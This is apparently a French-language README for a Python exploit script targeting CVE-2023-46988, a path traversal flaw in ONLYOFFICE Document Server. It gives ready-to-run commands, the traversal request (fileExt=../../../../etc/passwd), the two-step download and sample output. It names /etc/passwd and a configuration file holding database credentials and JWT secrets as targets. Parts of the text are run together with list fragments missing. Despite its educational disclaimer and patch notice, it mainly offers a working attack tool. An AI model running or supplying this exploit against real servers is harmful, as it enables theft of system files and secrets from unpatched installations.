
CVE-2023-46988 : Exploit de traversée de chemin ONLYOFFICE
Ce script exploite une vulnérabilité de traversée de chemin dans ONLYOFFICE Document Server (CVE-2023-46988) qui permet à des utilisateurs non autorisés de copier des fichiers arbitraires depuis le serveur. La vulnérabilité existe dans le point de terminaison /example/editor, où le paramètre fileExt peut être manipulé pour accéder à des fichiers système et de configuration sensibles.
Cet outil est destiné uniquement à des fins éducatives et de recherche en sécurité autorisée.
Toute utilisation non autorisée contre des systèmes sans autorisation explicite est illégale et contraire à l'éthique.
/etc/passwd/etc/onlyoffice/documentserver/local.json (contient les identifiants de base de données et les secrets JWT)--file.--proxy).--verify).python onlyoffice_exploit.py http://localhost
Ceci récupère :
/etc/passwd/etc/onlyoffice/documentserver/local.json/etc/hosts)python onlyoffice_exploit.py http://localhost --file /etc/hosts
127.0.0.1:8080)python onlyoffice_exploit.py http://localhost --proxy
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
python onlyoffice_exploit.py https://example.local --verify
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
/example/editor avec un paramètre fileExt malveillant :
GET /example/editor?fileExt=../../../../../../../../etc/passwd
/example/download?fileName=<nom_de_fichier_extrait>.[*] URL cible : http://localhost
[*] Tentative de récupération : /etc/passwd
[*] Envoi de la requête à : http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] URL de redirection extraite : http://localhost/example/download?fileName=.passwd
[+] Nom de fichier extrait : .passwd
[*] Téléchargement du fichier : http://localhost/example/download?fileName=.passwd
[+] Fichier téléchargé avec succès : .passwd
ONLYOFFICE a corrigé cette vulnérabilité dans sa mise à jour de février 2024.
Les utilisateurs doivent mettre à jour vers la dernière version pour protéger leurs serveurs.
Ce projet est sous licence MIT License – voir le fichier LICENSE pour plus de détails.